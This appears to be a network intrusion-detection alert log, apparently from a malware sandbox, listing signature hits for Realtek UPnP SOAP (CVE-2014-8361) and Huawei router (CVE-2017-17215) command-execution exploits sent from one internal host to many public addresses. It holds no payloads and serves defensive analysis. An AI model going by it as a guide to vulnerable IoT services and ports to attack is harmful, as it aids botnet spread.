                                      07/20/24-23:01:49.356902TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3989852869192.168.2.2313.35.187.229
                                      07/20/24-23:00:59.203960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5494837215192.168.2.23157.23.56.129
                                      07/20/24-23:01:42.622797TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5511652869192.168.2.23169.186.230.20
                                      07/20/24-23:01:31.318206TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23351852869192.168.2.2358.239.1.240
                                      07/20/24-23:01:42.479337TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4574052869192.168.2.23205.156.124.10
                                      07/20/24-23:01:43.380019TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25218052869192.168.2.23108.216.198.203
                                      07/20/24-23:01:11.632393TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4588637215192.168.2.2393.63.209.119
                                      07/20/24-23:01:48.931855TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4601052869192.168.2.23213.131.100.211
                                      07/20/24-23:00:59.187842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5223437215192.168.2.23157.17.98.184
                                      07/20/24-23:01:20.096752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5922037215192.168.2.23157.154.59.174
                                      07/20/24-23:01:21.954501TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4903037215192.168.2.23157.161.67.148
                                      07/20/24-23:01:00.634292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3606637215192.168.2.2358.150.96.208
                                      07/20/24-23:01:41.321505TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614492852869192.168.2.23108.79.31.157
                                      07/20/24-23:01:27.650505TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5172637215192.168.2.23157.174.105.214
                                      07/20/24-23:01:34.060991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3990437215192.168.2.23197.225.60.182
                                      07/20/24-23:01:40.320408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5878837215192.168.2.23191.219.30.38
                                      07/20/24-23:01:02.735576TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613624852869192.168.2.2363.80.178.96
                                      07/20/24-23:01:27.649775TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3372837215192.168.2.23157.60.95.77
                                      07/20/24-23:01:42.588824TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3342052869192.168.2.23218.206.46.127
                                      07/20/24-23:01:44.306318TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3993252869192.168.2.23186.139.241.135
                                      07/20/24-23:01:45.188773TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4018052869192.168.2.238.242.14.128
                                      07/20/24-23:01:25.608031TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614353252869192.168.2.2391.130.242.221
                                      07/20/24-23:01:45.933453TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3328252869192.168.2.2373.152.115.130
                                      07/20/24-23:01:48.386032TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614138252869192.168.2.2385.103.184.164
                                      07/20/24-23:01:34.044717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5923837215192.168.2.23157.189.171.193
                                      07/20/24-23:01:51.290015TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614380052869192.168.2.239.66.181.144
                                      07/20/24-23:01:12.811667TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3669852869192.168.2.23106.229.130.40
                                      07/20/24-23:01:45.072641TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4214052869192.168.2.23107.204.90.199
                                      07/20/24-23:01:11.642449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4929237215192.168.2.23197.139.56.71
                                      07/20/24-23:01:44.036421TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3563052869192.168.2.23163.195.26.201
                                      07/20/24-23:01:47.995202TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5724252869192.168.2.23102.51.73.237
                                      07/20/24-23:01:54.037758TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5823252869192.168.2.23112.218.81.136
                                      07/20/24-23:01:00.637175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5192637215192.168.2.2341.13.46.200
                                      07/20/24-23:01:46.817503TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613933652869192.168.2.2342.169.174.111
                                      07/20/24-23:00:59.154068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5250037215192.168.2.23197.58.83.134
                                      07/20/24-23:01:27.653586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6084037215192.168.2.2337.233.245.194
                                      07/20/24-23:01:44.489022TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23543452869192.168.2.2382.91.121.224
                                      07/20/24-23:01:55.870348TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3942852869192.168.2.23157.175.172.46
                                      07/20/24-23:01:12.813695TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4206452869192.168.2.2351.49.44.101
                                      07/20/24-23:01:24.876750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5897837215192.168.2.23197.245.203.130
                                      07/20/24-23:01:07.036064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5693437215192.168.2.23141.231.204.102
                                      07/20/24-23:01:47.902509TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4429052869192.168.2.23206.59.132.204
                                      07/20/24-23:01:45.175511TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5248852869192.168.2.2399.207.71.238
                                      07/20/24-23:01:44.155894TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24380252869192.168.2.23107.189.251.198
                                      07/20/24-23:01:43.946379TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613498252869192.168.2.23221.195.227.25
                                      07/20/24-23:01:08.597662TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3671052869192.168.2.23208.190.62.115
                                      07/20/24-23:01:59.799089TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614490052869192.168.2.2324.206.57.165
                                      07/20/24-23:01:47.807536TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3734452869192.168.2.23157.175.172.46
                                      07/20/24-23:01:47.918473TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613942452869192.168.2.23197.213.222.122
                                      07/20/24-23:00:57.220949TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5313037215192.168.2.23157.110.226.143
                                      07/20/24-23:01:41.245522TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5736252869192.168.2.23191.61.198.111
                                      07/20/24-23:01:41.290518TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4999452869192.168.2.2369.103.140.112
                                      07/20/24-23:01:41.912337TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24254852869192.168.2.2335.204.82.212
                                      07/20/24-23:01:56.246775TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615967652869192.168.2.239.38.202.199
                                      07/20/24-23:01:11.822392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4685237215192.168.2.2360.49.240.179
                                      07/20/24-23:01:46.444461TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25297052869192.168.2.23197.9.101.249
                                      07/20/24-23:01:54.672544TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23485252869192.168.2.23132.173.198.51
                                      07/20/24-23:01:47.377081TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23499452869192.168.2.23207.27.209.75
                                      07/20/24-23:01:53.607815TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25993652869192.168.2.23159.51.221.45
                                      07/20/24-23:01:07.082045TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5653837215192.168.2.23157.54.52.255
                                      07/20/24-23:01:11.632393TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3750837215192.168.2.23197.118.42.51
                                      07/20/24-23:01:51.743446TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23689452869192.168.2.2397.254.137.62
                                      07/20/24-23:01:42.634606TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6026252869192.168.2.2387.53.250.191
                                      07/20/24-23:01:41.148932TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5409052869192.168.2.23123.91.96.233
                                      07/20/24-23:01:59.738271TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613429052869192.168.2.2352.14.151.104
                                      07/20/24-23:01:08.646615TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5199052869192.168.2.23107.208.110.238
                                      07/20/24-23:01:31.322217TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5042052869192.168.2.23125.53.48.130
                                      07/20/24-23:01:53.066716TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24329252869192.168.2.2353.50.156.29
                                      07/20/24-23:01:58.202290TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23393052869192.168.2.2354.42.165.29
                                      07/20/24-23:01:43.489480TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4567452869192.168.2.23106.236.204.67
                                      07/20/24-23:01:42.322405TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613510052869192.168.2.23203.80.83.187
                                      07/20/24-23:01:44.700808TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5501252869192.168.2.23180.13.32.83
                                      07/20/24-23:01:14.164018TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3459252869192.168.2.2373.36.171.85
                                      07/20/24-23:01:31.977603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4774437215192.168.2.23169.189.57.200
                                      07/20/24-23:01:40.322860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4249037215192.168.2.2341.254.32.226
                                      07/20/24-23:01:01.150119TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4246452869192.168.2.23157.202.7.129
                                      07/20/24-23:01:47.147727TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3834052869192.168.2.2363.211.43.107
                                      07/20/24-23:01:58.995803TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615422252869192.168.2.23129.78.244.230
                                      07/20/24-23:01:20.591832TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4591252869192.168.2.2327.150.162.76
                                      07/20/24-23:01:44.510114TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4398452869192.168.2.23113.178.52.80
                                      07/20/24-23:01:04.747554TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615782452869192.168.2.2343.227.14.32
                                      07/20/24-23:01:11.818830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5722037215192.168.2.23197.3.21.51
                                      07/20/24-23:01:25.845560TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4337052869192.168.2.23112.202.108.197
                                      07/20/24-23:01:46.450129TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4868252869192.168.2.2338.183.196.72
                                      07/20/24-23:01:08.581974TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25963052869192.168.2.23135.9.168.169
                                      07/20/24-23:01:08.652877TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23477452869192.168.2.2386.219.42.227
                                      07/20/24-23:01:24.929013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3609637215192.168.2.2317.145.238.56
                                      07/20/24-23:00:59.161892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5275237215192.168.2.23157.176.101.215
                                      07/20/24-23:01:20.181938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3716437215192.168.2.23121.14.221.201
                                      07/20/24-23:00:57.222091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5590637215192.168.2.23197.159.88.79
                                      07/20/24-23:01:48.986585TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615270652869192.168.2.23105.66.231.198
                                      07/20/24-23:01:08.611774TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5963452869192.168.2.23151.194.118.37
                                      07/20/24-23:01:43.001716TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613638852869192.168.2.23161.217.163.253
                                      07/20/24-23:01:07.005156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6055637215192.168.2.23197.121.20.109
                                      07/20/24-23:01:59.660917TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23873052869192.168.2.23209.27.18.74
                                      07/20/24-23:01:41.722161TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4348652869192.168.2.2391.196.45.114
                                      07/20/24-23:01:00.638305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4895637215192.168.2.2341.95.27.201
                                      07/20/24-23:01:27.664887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3667037215192.168.2.23209.48.250.210
                                      07/20/24-23:01:50.255748TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26079452869192.168.2.2379.217.40.139
                                      07/20/24-23:01:46.261026TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25121052869192.168.2.23136.148.234.160
                                      07/20/24-23:01:53.631467TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615072852869192.168.2.23223.155.76.150
                                      07/20/24-23:02:12.082957TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3320052869192.168.2.2367.40.156.6
                                      07/20/24-23:01:41.286911TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4507452869192.168.2.2334.33.43.162
                                      07/20/24-23:02:00.055900TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3808052869192.168.2.2318.137.178.82
                                      07/20/24-23:01:02.130152TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615925052869192.168.2.23115.35.215.139
                                      07/20/24-23:01:41.258056TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4468252869192.168.2.23152.44.195.237
                                      07/20/24-23:02:01.256493TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5251252869192.168.2.23133.248.174.120
                                      07/20/24-23:01:31.982801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3717237215192.168.2.23115.205.119.137
                                      07/20/24-23:01:44.546338TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5225052869192.168.2.2385.144.205.165
                                      07/20/24-23:01:45.625081TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5966652869192.168.2.2373.50.29.53
                                      07/20/24-23:01:45.179680TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5981452869192.168.2.23133.159.36.252
                                      07/20/24-23:02:11.592030TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5383852869192.168.2.23116.124.94.169
                                      07/20/24-23:01:41.750477TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24795852869192.168.2.23197.168.237.206
                                      07/20/24-23:01:43.918137TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613552052869192.168.2.23207.100.140.133
                                      07/20/24-23:01:45.109699TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25293652869192.168.2.2324.151.6.155
                                      07/20/24-23:01:25.600782TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615652252869192.168.2.23157.108.156.75
                                      07/20/24-23:01:47.906061TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3313652869192.168.2.2398.169.154.123
                                      07/20/24-23:01:31.335096TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25235252869192.168.2.23143.38.216.11
                                      07/20/24-23:02:08.246801TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613732652869192.168.2.23117.32.81.72
                                      07/20/24-23:01:31.318206TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5756052869192.168.2.23119.38.147.179
                                      07/20/24-23:01:04.040812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5813237215192.168.2.23197.60.100.137
                                      07/20/24-23:00:57.221803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5060237215192.168.2.23157.15.115.232
                                      07/20/24-23:01:04.040812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5474637215192.168.2.2359.29.162.151
                                      07/20/24-23:01:20.157620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4802237215192.168.2.23174.188.105.70
                                      07/20/24-23:01:04.098080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4293237215192.168.2.23197.59.135.254
                                      07/20/24-23:02:02.509837TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615485452869192.168.2.2341.136.217.138
                                      07/20/24-23:01:11.632393TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3837837215192.168.2.23197.21.89.53
                                      07/20/24-23:01:49.272788TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23737652869192.168.2.2340.122.120.5
                                      07/20/24-23:01:55.546480TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25613652869192.168.2.2389.142.100.244
                                      07/20/24-23:01:02.280127TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613639252869192.168.2.23161.20.12.87
                                      07/20/24-23:01:11.816074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3920837215192.168.2.23147.129.214.239
                                      07/20/24-23:01:20.591397TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4461452869192.168.2.23217.255.100.151
                                      07/20/24-23:01:07.061779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3731637215192.168.2.23157.233.118.145
                                      07/20/24-23:01:44.408559TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4371252869192.168.2.23209.24.146.250
                                      07/20/24-23:01:53.041672TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4615252869192.168.2.23164.75.171.71
                                      07/20/24-23:01:42.703494TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26061852869192.168.2.2367.41.35.87
                                      07/20/24-23:01:57.297792TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615006852869192.168.2.2341.175.245.11
                                      07/20/24-23:01:40.296076TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4655837215192.168.2.23157.116.51.144
                                      07/20/24-23:01:42.101588TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3515652869192.168.2.23158.36.226.221
                                      07/20/24-23:01:24.929013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5619637215192.168.2.23197.78.152.186
                                      07/20/24-23:01:42.093693TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615664052869192.168.2.23176.127.40.36
                                      07/20/24-23:01:43.476083TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4090452869192.168.2.23184.170.174.78
                                      07/20/24-23:01:48.701127TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5330852869192.168.2.23170.121.46.240
                                      07/20/24-23:00:59.211046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3817637215192.168.2.2341.20.53.198
                                      07/20/24-23:00:57.222008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3555037215192.168.2.23168.165.233.141
                                      07/20/24-23:01:40.336908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4664637215192.168.2.2313.232.148.145
                                      07/20/24-23:01:42.800757TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4121052869192.168.2.23148.205.165.15
                                      07/20/24-23:01:21.923917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3293637215192.168.2.23115.85.103.199
                                      07/20/24-23:01:43.085956TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5540452869192.168.2.23194.44.142.130
                                      07/20/24-23:01:45.034156TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23371652869192.168.2.23107.163.195.19
                                      07/20/24-23:01:26.031343TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615347052869192.168.2.23118.217.116.132
                                      07/20/24-23:01:31.977603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4264637215192.168.2.23197.182.219.57
                                      07/20/24-23:01:44.826234TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24217252869192.168.2.235.118.234.148
                                      07/20/24-23:01:42.984532TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614435852869192.168.2.2342.66.196.35
                                      07/20/24-23:01:06.994337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3797837215192.168.2.2370.132.198.251
                                      07/20/24-23:01:44.469580TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614301852869192.168.2.23137.85.104.5
                                      07/20/24-23:01:45.188773TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26084252869192.168.2.23142.215.251.21
                                      07/20/24-23:01:26.100052TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4778652869192.168.2.23120.48.178.89
                                      07/20/24-23:01:52.388927TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3604252869192.168.2.2371.66.59.209
                                      07/20/24-23:01:47.709674TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24742052869192.168.2.2357.16.142.227
                                      07/20/24-23:01:31.991548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4475037215192.168.2.2388.106.127.51
                                      07/20/24-23:01:41.397238TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3413852869192.168.2.2348.145.35.196
                                      07/20/24-23:02:09.627181TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614919652869192.168.2.23164.143.82.53
                                      07/20/24-23:01:04.098909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4060437215192.168.2.23197.244.103.67
                                      07/20/24-23:01:40.311124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5935037215192.168.2.23109.129.243.233
                                      07/20/24-23:01:42.115230TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5504852869192.168.2.23221.103.3.16
                                      07/20/24-23:01:08.667513TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5591652869192.168.2.23132.102.141.171
                                      07/20/24-23:01:57.321431TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614131252869192.168.2.23166.233.183.8
                                      07/20/24-23:01:55.666677TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4707852869192.168.2.23210.201.187.18
                                      07/20/24-23:03:46.099099TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4215852869192.168.2.2339.42.185.132
                                      07/20/24-23:00:59.192052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4308837215192.168.2.23198.69.140.160
                                      07/20/24-23:01:00.648489TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5485437215192.168.2.23157.21.145.183
                                      07/20/24-23:01:53.234960TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613688052869192.168.2.23217.154.142.187
                                      07/20/24-23:01:46.810790TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614370652869192.168.2.23154.173.158.60
                                      07/20/24-23:01:53.015544TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613722852869192.168.2.23121.131.41.98
                                      07/20/24-23:01:50.176893TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615067652869192.168.2.2380.92.70.69
                                      07/20/24-23:01:02.076414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5360037215192.168.2.2341.131.89.154
                                      07/20/24-23:01:42.189694TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5817052869192.168.2.2350.61.91.2
